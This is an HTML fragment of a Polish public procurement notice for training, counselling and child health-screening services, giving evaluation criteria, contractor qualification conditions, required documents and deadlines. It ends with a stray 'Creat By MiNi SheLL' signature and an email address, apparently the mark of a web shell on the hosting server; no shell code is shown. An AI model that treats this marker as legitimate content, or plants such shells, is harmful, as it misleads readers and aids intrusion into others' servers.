realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koordynator – doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium społeczne zatrudnieniowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek udziału w postępowaniu - zdolność techniczna lub zawodowa<br/>Dla CZĘŚCI 1<br/><br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że <br/>1. W okresie ostatnich (3) trzech lat przed upływem terminu składania ofert w Postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, co najmniej 3 usługi organizacji i realizacji szkoleń lub warsztatów i/lu wsparcia indywidualnego obejmujące jeden lub więcej zakresów wymienionych poniżej:<br/>1) w zakresie integracji emocjonalnej <br/>2) komunikacji partnerskiej <br/>3) kompetencji rodzicielskich <br/>4) integracji sensorycznej <br/>5) terapii taktylnej <br/>6) wsparcia z zakresie zastępowania agresji <br/>7) wsparcia szkoleniowego w zakresie uzależnień<br/>8 ) warsztatów w zakresie spędzania czasu wolnego,<br/>9) poradnictwa psychologicznego,<br/>10) poradnictwa logopedycznego,<br/>11) poradnictwa neurologopedycznego, <br/>12) poradnictwa dietetycznego,<br/>13) poradnictwa fizjoterapeutycznego,<br/>14) poradnictwa pedagogicznego, <br/><br/>2. dysponuje co najmniej 1 osobą do pełnienia funkcji koordynatora usług, która w okresie ostatnich 3 lat przed upływem terminu składania ofert / przez okres co najmniej 6 miesięcy / organizowała i realizowała lub bezpośrednio nadzorowała, a w przypadku usług okresowych lub ciągłych organizuje i realizuje lub bezpośrednio nadzoruje, organizację i realizację co najmniej 1 zamówienia objętego jedną umową o wartości brutto co najmniej 200.000 (słownie: dwieście tysięcy złotych) / obejmującego usługi organizacji i realizacji szkoleń i/lub warsztatów i/lub wsparcia indywidualnego w co najmniej 5 zakresach spośród 14-tu niżej wymienionych tj.: w co najmniej 5 spośród następujących 14 zakresów:<br/>1) w zakresie integracji emocjonalnej <br/>2) komunikacji partnerskiej <br/>3) kompetencji rodzicielskich <br/>4) integracji sensorycznej <br/>5) terapii taktylnej <br/>6) wsparcia z zakresie zastępowania agresji <br/>7) wsparcia szkoleniowego w zakresie uzależnień<br/>8 ) warsztatów w zakresie spędzania czasu wolnego,<br/>9) poradnictwa psychologicznego,<br/>10) poradnictwa logopedycznego,<br/>11) poradnictwa neurologopedycznego, <br/>12) poradnictwa dietetycznego,<br/>13) poradnictwa fizjoterapeutycznego,<br/>14) poradnictwa pedagogicznego.<br/><br/>3.	Dysponuje osobami zdolnymi do wykonania niniejszego zamówienia, tj. kadrą obejmującą co najmniej po 1 osobie do realizacji następujących form wsparcia:<br/>1) w zakresie integracji emocjonalnej <br/>2) komunikacji partnerskiej <br/>3) kompetencji rodzicielskich <br/>4) integracji sensorycznej <br/>5) terapii taktylnej <br/>6) wsparcia z zakresie zastępowania agresji <br/>7) wsparcia szkoleniowego w zakresie uzależnień<br/>8 ) warsztatów w zakresie spędzania czasu wolnego,<br/>9) poradnictwa psychologicznego,<br/>10) poradnictwa logopedycznego,<br/>11) poradnictwa neurologopedycznego, <br/>12) poradnictwa dietetycznego,<br/>13) poradnictwa fizjoterapeutycznego,<br/>14) poradnictwa pedagogicznego.<br/><br/>Każda z osób wskazanych przez Wykonawcę, musi legitymować się doświadczeniem obejmującym co najmniej 100 godzin zajęć zrealizowanych w okresie ostatnich 3 lat przed terminem składania ofert w obszarze tematycznym do którego jest wykazywana. <br/>Do realizacji zajęć wskazanych w zakresie tematycznym 1,2,3 może zostać wskazana 1 osoba.<br/>Do realizacji zajęć wskazanych w zakresie tematycznym 4,5 może zostać wskazana 1 osoba.<br/>Do realizacji zajęć wskazanych w zakresie tematycznym 10,11 może zostać wskazana 1 osoba.<br/><br/>Warunek udziału w postępowaniu - zdolność techniczna lub zawodowa<br/>Dla CZĘŚCI 2<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że <br/><br/>1. w okresie ostatnich (3) trzech lat przed upływem terminu składania ofert w Postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, co najmniej 1 usługę obejmującą:<br/>usługę badań przesiewowych dzieci w zakresie wad postawy i/lub badań wzroku i/lub badań dietetycznych i/lub badan audiologicznych<br/> <br/>oraz co najmniej 1ną usługę spośród niżej wymienionych: <br/>1)	Instruktaż w zakresie opieki nad osobą niesamodzielną realizowany przez pielęgniarkę,<br/>2)	Instruktaż w zakresie opieki nad osobą niesamodzielną realizowany przez fizjoterapeutę,<br/>3)	Usługa opiekuńcza dla osób z niepełnosprawnościami i/lub niesamodzielnych.<br/><br/>2. dysponuje co najmniej 1 osobą do pełnienia funkcji koordynatora usług, która w okresie ostatnich 3 lat przed upływem terminu składania ofert / przez okres co najmniej 6 miesięcy / organizowała i realizowała lub bezpośrednio nadzorowała, a w przypadku usług okresowych lub ciągłych organizuje i realizuje lub bezpośrednio nadzoruje, organizację i realizację co najmniej 1 zamówienia objętego jedną umową o wartości brutto co najmniej 200.000 zł (słownie: dwieście tysięcy złotych) / obejmującego usługi organizacji i realizacji szkoleń i/lub warsztatów i/lub wsparcia indywidualnego obejmującego co najmniej 1 zakres tematyczny spośród niżej wymienionych:<br/>1) usługę badań przesiewowych dzieci w zakresie wad postawy i/lub badań wzroku i/lub badań dietetycznych i/lub badań audiologicznych,<br/>2) instruktarz w zakresie opieki nad osobą niesamodzielną realizowany przez pielęgniarkę,<br/>3) instruktarz w zakresie opieki nad osobą niesamodzielną realizowany przez fizjoterapeutę,<br/>4) usługi opiekuńcze dla osób z niepełnosprawnościami i/lub niesamodzielnymi.<br/><br/>3. Dysponuje osobami zdolnymi do wykonania niniejszego zamówienia, tj. kadrą obejmującą co najmniej po 1 osobie do realizacji następujących form wsparcia:<br/>1) badania przesiewowe wad postawy,<br/>2) badania przesiewowe wzroku,<br/>3) badania przesiewowe słuchu,<br/>4) badania przesiewowe dietetyczne. <br/><br/>Każda z osób wskazanych przez Wykonawcę, musi legitymować się doświadczeniem obejmującym co najmniej 100 badan (usług / jednostek badań mierzonych liczbą przebadanych pacjentów) zrealizowanych w okresie ostatnich 3 lat przed terminem składania ofert w obszarze tematycznym do którego jest wykazywana. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3	Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu – Załącznik nr 7 do SWZ <br/>o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust. 1 ustawy, wzór oświadczenia stanowi Załącznik do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wymagany dokument dla CZĘŚCI 1<br/>1	Wykaz usług – Załącznik nr 4 do SWZ<br/>Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat (liczonych wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem dat wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane lub są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (liczonych wstecz od dnia, w którym upływa termin składania ofert). <br/><br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi Wykonawcami, wykaz powinien dotyczyć usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy. <br/><br/>2	Wykaz osób – Załącznik nr 4a do SWZ<br/>Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/><br/>Wymagany dokument dla CZĘŚCI 2<br/>1	Wykaz usług – Załącznik nr 4 do SWZ<br/>Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat (liczonych wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, dat wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane lub są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (liczonych wstecz od dnia, w którym upływa termin składania ofert). <br/><br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi Wykonawcami, wykaz powinien dotyczyć usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy. <br/><br/>2	Wykaz osób – Załącznik nr 4a do SWZ<br/>Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca wraz z ofertą zobowiązany jest złożyć:<br/><br/>1	Formularz ofertowy<br/>2	Informacja o koordynatorze – jeżeli zamierza wykazać osoby, za których dysponowanie może otrzymać punkty w kryterium. W ww. sytuacji informację tę można złożyć jedynie z ofertą. Niezłożenie informacji oznacza, że Wykonawca nie otrzyma punktów w ramach kryteriów oceny ofert: Koordynator – doświadczenie <br/>3	Oświadczenie o spełnianiu warunków udziału i niepodleganiu wykluczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp<br/>- oświadczenie Wykonawcy stanowiące dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący podmiotowe środki dowodowe wymagane przez zamawiającego<br/>4	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia (o którym mowa w art. 117 ust 4 ustawy Pzp) – jeżeli dotyczy<br/>5	Zobowiązanie podmiotu udostępniającego zasoby oraz oświadczenie tego podmiotu o spełnianiu warunków udziału w postępowaniu i niepodleganiu wykluczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, a także dokument/y potwierdzające umocowanie do reprezentowania tego podmiotu – jeżeli dotyczy<br/>7	Dokument/y potwierdzające umocowanie do reprezentowania Wykonawcy <br/>8	Pełnomocnictwo dla pełnomocnika Wykonawcy, jeżeli oferta jest składana przez pełnomocnika – jeżeli dotyczy<br/>9	Pełnomocnictwo dla pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia – jeżeli dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 11.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>11.2.	Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>1)	postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3)	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>11.3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenia o spełnianiu warunków udziału w postępowaniu i niepodleganiu wykluczeniu” (tj. oświadczenie o którym mowa w art. 125 ust. 1 ustawy Pzp) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Wzór oświadczenia stanowi załącznik nr 2 do SWZ. <br/>11.4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których zdolności te są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie (o którym mowa w art. 117 ust. 4 ustawy Pzp), z którego wynika, które usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 6 do SWZ.<br/>11.5.	Podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia z postępowania, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający zastrzega możliwość zmiany Umowy w następującym zakresie:<br/>1)	terminu realizacji Umowy wynikającym ze zmiany harmonogramu realizacji projektu lub przedłużającej się procedury wyboru Wykonawcy w postępowaniu lub przedłużającej się procedury podpisywania Umowy; <br/>2)	w związku ze zmianą umowy o dofinasowanie projektu, w ramach którego realizowany jest Przedmiot Umowy, gdy zmiana polegać będzie na dostosowaniu treści Umowy do warunków wynikających ze zmiany umowy o dofinansowanie;<br/>3)	w związku ze zmianą powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Umowy, gdzie zmiana będzie polegać na dostosowaniu treści Umowy do zmienionych przepisów prawa, bez wpływu na wysokość wynagrodzenia Wykonawcy;<br/>4)	gdy zaistnieją nowe, szczególne okoliczności, niezależne od Zamawiającego i Wykonawcy, uzasadniające zmiany terminu realizacji umowy, przy czym zmiana terminu może być dokonana tylko w zakresie wynikającym z tych okoliczności, bez wpływu na wysokość wynagrodzenia Wykonawcy;<br/>5)	gdy zaistnieje siła wyższa mająca wpływ na realizację umowy, przy czym za siłę wyższą (w szczególności: powódź, pożar i inne klęski żywiołowe, pandemie i epidemie, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia itp.), gdzie zmiana będzie polegać będzie na dostosowaniu treści umowy celem uchylenia negatywnych skutków siły wyżej na realizację Przedmiotu Umowy,<br/><br/>Pozostałe przesłanki zmiany umowy zawarte zostały par. 7 Załącznika nr 8 [Projektowane postanowienia umowy]. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-27 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Nie</span></p> <p class="mb-0">Część 2 : <span class="normal">Nie</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com